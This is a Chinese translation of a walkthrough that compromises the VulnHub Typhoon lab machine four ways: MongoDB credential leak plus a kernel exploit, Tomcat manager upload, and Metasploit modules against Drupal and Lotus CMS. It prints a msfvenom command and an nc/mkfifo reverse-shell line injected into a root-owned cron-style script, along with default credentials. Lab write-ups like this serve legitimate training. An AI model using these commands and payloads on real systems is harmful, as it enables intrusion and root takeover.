靶機滲透之Typhoon實戰

本次的Typhoon靶機包含了幾個漏洞和配置錯誤。你們可以用這個靶機來測試網路服務漏洞，配置錯誤，web應用漏洞，也可以進行密碼破解攻擊，提權，後滲透，還可以進行信息收集和DNS攻擊。

靶機下載地址：https://www.vulnhub.com/entry/typhoon-102,267/

滲透測試方法

· 網路掃描(Netdiscover和Nmap都行)

· 方法一：利用MongoDB進行入侵

· 查看robots.txt

· 通過瀏覽器利用MongoDB

· 獲取憑證

· SSH登錄

· 查看內核版本

· 內核提權

· 拿到root shell

· 方法二：通過Tomcat管理界面進行入侵(藉助metasploit神器)

· 生成bash payload

· 上傳bash payload

· 拿下root shell

· 方法三：利用Drupal CMS進行入侵

· 方法四：利用Lotus CMS進行入侵

這個靶機漏洞較多，所以我們也有很多方法來滲透它。不過本文只演示兩種方法，其他方法大家可以自己琢磨。

方法1：通過MongoDB入侵

實戰開始

第一步，使用netdiscover進行網路發現，找到我們的靶機IP。

netdiscover


我們這裡的IP是192.168.1.101（每個人的IP可能不一樣）。

下一步是對IP進行掃描，當然是少不了Nmap神器。

nmap -A 192.168.1.101


掃完後可以看到開放的埠和對應的服務如下：

· 21(ftp),

· 22(ssh),

· 25(smtp),

· 53(domain),

· 80(http),

· 110(pop3)

· 111(rpcbind)

· 139(netbios-ssn)

· 143(imap)

· 445(netbios-ssn)

· 631(ipp)

· 993(ssl/imaps),

· 995(ssl/pop3)

· 2049(nfs_acl)

· 3306(mysql),

· 5432(postgrespl)

· 8080(http)

如圖：

在圖中，可以看到robots.txt文件中/monoadmin這個目錄禁止訪問，這個目錄可能會有用。我們還注意到8080埠也開放了，對應的服務是Apache Tomcat，使用的引擎是Coyote JSP engine1.1。這可能是另外一種滲透靶機的方法，我們一會兒再來看看。

我們先還是從80埠入手，通過瀏覽器訪問一下/monoadmin這個目錄，訪問結果如圖所示：

這裡我們設置 change database為credentials(84mb)，它會顯示2個憑證的鏈接，我們點擊一下這個鏈接，竟然顯示出了用戶名和密碼，用戶名是typhoon，密碼是789456123，如圖：

這個憑證對進一步滲透可能會大有幫助。

過了一會兒之後，突然腦海中蹦出來一個大膽的猜測，既然開放了22埠，那為什麼不用剛才發現的憑證登錄一下ssh試試呢，不得不說真是瞎貓碰上了死耗子，竟然成功登陸上來了，如圖：

登錄之後，我們發現虛擬機操作系統是Ubuntu14.04。而我們對Ubuntu14.04的提權exp也比較熟悉，這真是太棒了。

接著，我們用使用searchsploit來搜索Ubuntu14.04的提權exp，我們使用的exp已經在下圖中用紅框框出來了，然後我們將exp 37292.c複製到/root/directory目錄下，然後使用Python啟動一個伺服器，從靶機中來下載這個exp。

exp搜索如圖：

在靶機中把exp下載下來之後，將它放到/tmp目錄下，然後編譯exp並賦予許可權，然後執行。

哦耶，成功提權到root。並且找到flag就在根目錄下，查看一下文件內容即可得到flag，如圖：

方法2：通過Tomcat Manager入侵

思路是這樣的，利用Tomcat Manager Upload可以獲得一個meterpreter會話，然後建立反向連接獲得root許可權。

OK，開始滲透實戰。

前面通過掃描已經知道了8080埠是開放的，而且運行的是Apache Tomcat服務，直接在瀏覽器中訪問8080埠看看，如圖：

通過以前其他靶機的實戰操作，我們已經對使用manager webapp來登錄Tomcat伺服器非常熟悉了。於是我們直接使用metasploit的一個模塊tomcat_mgr_upload來嘗試進行登錄，使用Tomcat默認的用戶名密碼即可。

用戶名：tomcat

密碼：tomcat

噢耶，登錄成功，獲得meterpreter會話，如圖：

進來之後發現是一個Python shell，以前我們也經常遇到，使用一條命令就可以進入系統的shell，命令如下：

python -c 『import pty;pty.spawn(「/bin/bash」)』


上圖中也已經框出來這條命令。

接著我們花了一些時間來查找和遍歷文件，發現在/tab目錄下有一個script.sh文件，所有者是root，並且擁有所有許可權。

既然如此，那我們就想著往這個文件里插入一些惡意代碼。

OK，那我們就使用msfvenom來生成一段bash code，命令如下：

msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=1234 R


生成的惡意代碼如圖：

然後我們將此惡意代碼插入到script.sh文件中，使用如下命令：

echo "mkfifo /tmp/vvwjo; nc 192.168.1.109 1234 0</tmp/vvwjo | /bin/sh >/tmp/vvwjo 2>&1; rm /tmp/vvwjo" > script.sh


如圖：

由於惡意代碼在script.sh文件中得以執行後，我們在監聽的nc埠上獲得了一個反向的shell，而這個shell的許可權直接是root，接下來查看root-flag就不多說了。

方法三：通過Drupal CMS入侵

訪問80埠時並沒有發現什麼，於是我們使用Dirb來對web目錄進行遍歷，看看有沒有新發現，如圖：

如圖可知，有兩個cms目錄，已經標記出來，有一個是drupal，這就有點搞頭了。訪問一下drupal目錄，如圖：

在metasploit中有一個可以直接利用drupal cms的模塊，那就不多啰嗦了，直接上metasploit，命令如下：

use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(/unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.101
msf exploit(/unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
msf exploit(/unix/webapp/drupal_drupalgeddon2) > exploit


nice，依然可以順利拿下meterpreter會話，是不是很爽。接下來的後滲透就跟方法一中方法一樣，大家可以自己嘗試。

方法四：通過Lotus CMS入侵

剛才通過目錄掃描，發現了兩個cms目錄，我們已經對drupal cms進行入侵了，現在我們再來搞一下第二個cms，首先還是通過瀏覽器訪問一下，如圖：

其實方法跟上面的一樣，metasploit中也有一個可以直接利用lotus cms的模塊，利用命令如下：

use exploit/multi/http/lcms_php_exec
msf exploit(multi/http/lcms_php_exec) > set rhost 192.168.1.101
msf exploit(multi/http/lcms_php_exec) > set uri /cms/
msf exploit(multi/http/lcms_php_exec) > exploit


執行命令後，結果如圖：

非常棒，我們同樣獲得了靶機的另一個meterpreter會話，後滲透的步驟跟上面的一樣，就不啰嗦了，大家自己跟著方法一的步驟做一遍即可。

本文翻譯自：https://www.hackingarticles.in/typhoon-1-02-vulnhub-walkthrough/如若轉載，請註明原文地址： http://www.4hou.com/system/15217.html 更多內容請關注「嘶吼專業版」——Pro4hou

推薦閱讀：